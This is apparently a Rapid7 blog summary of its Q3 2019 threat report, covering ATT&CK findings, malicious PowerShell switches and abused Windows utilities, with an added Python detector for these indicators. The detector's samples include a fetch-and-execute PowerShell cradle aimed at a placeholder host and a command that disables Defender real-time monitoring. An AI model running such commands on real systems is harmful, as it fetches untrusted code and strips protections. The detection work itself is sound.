We’ve got something exciting in store for you in this quarter’s Rapid7 Quarterly Threat Report: the MITRE ATT&CK™ framework!

That’s right, we’ve spent the last couple quarters aligning our data sources with the ATT&CK framework in hopes of gaining more insight into attacker activities and impact to the organizations we cover in the report … and IT WORKED!

Figure 3: MITRE tactics by industry

Here are a few key findings that came out of our analysis:

  1. Our MDR team is WAY above the industry average, with the majority of threats identified and remediated in under one day from detection.
  2. The majority of detections occur in the “Execution” phase on the MITRE ATT&CK™ framework.
  3. Within the “Execution” tactic, we see attackers using a ton of PowerShell and third-party software techniques.

Figure: In Q3 of 2019 we have seen a dramatic increase in PowerShell usage from attackers.

We also decided to go deeper than before into the data from Rapid7’s Managed Detection and Response (MDR) team and perform analysis on that PowerShell and Windows utility usage by attackers. We uncovered some interesting trends in switch usage for malicious use of PowerShell, including:

  • “Set-MpPreference -DisableRealtimeMonitoring $true” to disable Windows protections.
  • “Net.WebClient” and “DownloadString” to fetch additional content.
  • “-EncodedCommand” to bypass real-time monitoring software and evade detection.
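As an added defender-side example (not code from the report or from Rapid7), here is a small Python triage routine that checks a process command line for the three indicators above. It decodes any -EncodedCommand payload first, so a Set-MpPreference call hidden behind -enc is still caught; the sample command lines are constructed.

```python
import base64
import re

# Any "-e..." switch followed by a base64 token; decode_encoded_command() decides
# which of those switches really mean -EncodedCommand.
ENC_SWITCH = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
DISABLE_RTM = re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand payload, or None if absent.
    powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec,
    so -ExecutionPolicy and -ep must be told apart from the real switch."""
    for m in ENC_SWITCH.finditer(cmdline):
        switch = m.group(1).lower()
        if switch != "ec" and not "encodedcommand".startswith(switch):
            continue
        try:
            # PowerShell base64-encodes the UTF-16LE form of the command.
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(cmdline):
    """Return the set of report indicators found in one process command line,
    checking both the visible arguments and any decoded -EncodedCommand payload."""
    hits = set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_command")
    for text in (cmdline, decoded or ""):
        if DISABLE_RTM.search(text):
            hits.add("disable_realtime_monitoring")
        if "net.webclient" in text.lower() and "downloadstring" in text.lower():
            hits.add("download_cradle")
    return hits


# Constructed sample command lines (not from the report); the second one hides
# the Set-MpPreference call behind -enc, the third is a benign scheduled script.
_HIDDEN = "Set-MpPreference -DisableRealtimeMonitoring $true"
SAMPLES = [
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
    "powershell.exe -NoProfile -enc " + base64.b64encode(_HIDDEN.encode("utf-16-le")).decode(),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
]


def scan(samples=SAMPLES):
    """Map each command line to the indicators it triggers; an empty set means clean."""
    return {line: analyze(line) for line in samples}
```

Running `scan()` over the samples flags the download cradle on the first line, both the encoded command and the Defender tampering on the second, and nothing on the benign third line.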

For the Windows utilities, below are the top 15 command line utilities used by attackers in the third quarter:

| Executable | Description |
| --- | --- |
| cmd.exe | The Windows command line interpreter. Attackers use this to interact with the entire operating system. |
| powershell.exe | The Windows scripting language interpreter. Attackers use this utility to run scripts. |
| ADExplorer.exe | A SysInternals (now Microsoft) tool that allows you to visually explore Active Directory and its properties. |
| rundll32.exe | The Windows dynamic library loader. This is just another way to run code in Windows. |
| procdump64.exe | A SysInternals (now Microsoft) tool that allows you to monitor processes, run debuggers, and dump process memory. Attackers use this to dump credentials from lsass.exe. |
| Mshta.exe | A Windows utility that runs Microsoft HTML Application (.hta) files. Attackers use this utility to execute script and download remote files. |
| wmic.exe | A Windows command interface into Windows Management Instrumentation. Attackers use this utility to perform recon on hosts, execute programs on local and remote systems, establish covert persistence, and transfer data. |
| mimikatz.exe | A non-Microsoft application that allows attackers to gather credentials from Windows systems. |
| wscript.exe | Another Windows scripting language interpreter. Attackers use this utility to run scripts. |
| Schtasks.exe | A Windows utility that runs a program at a specified date and time. Attackers use this to run programs and persist on a system. |
| nircmdc.exe | A third-party command line utility that performs actions without a user interface. We observed attackers using this utility to gather screenshots from victims. |
| bitsadmin.exe | A Windows command line utility that performs uploads and downloads. Attackers use this to bring in tools and exfil data. |
| reg.exe | A Windows command line utility that interfaces with the Windows registry. Attackers use this to fetch stored credentials and persist tools and malware on systems. |
| certutil.exe | A Windows command line utility that interfaces with the certificate authority configuration. Attackers use this to download remote content and perform privilege escalation. |
| regsvr32.exe | A Windows command line utility that allows loading and unloading of dynamic libraries. Attackers use this to run remote code and bypass security controls. |

From Project Heisenberg, Rapid7’s global honeypot network, we have some visuals illustrating an increase in traffic seen targeting Microsoft SQL server, as well as continued targeting of the BlueKeep vulnerability.

Attacker activity has shown an increase in Microsoft SQL server targeting, and a continued focus on trying to exploit the BlueKeep vulnerability.

Figure: number of BlueKeep connections to the Heisenberg honeypot network

Last, we have some unusual DNS over TLS activity we’ve dug into:

Figure 11: Unusual DNS over TLS activity

If this is the kind of whodunit (well, howdunit, really) mystery writing you're interested in, you're invited to go download our latest Quarterly Threat Report and read up on the latest attacker trends, now written in ATT&CK-ese.

Read the Full 2019 Q3 Quarterly Threat Report
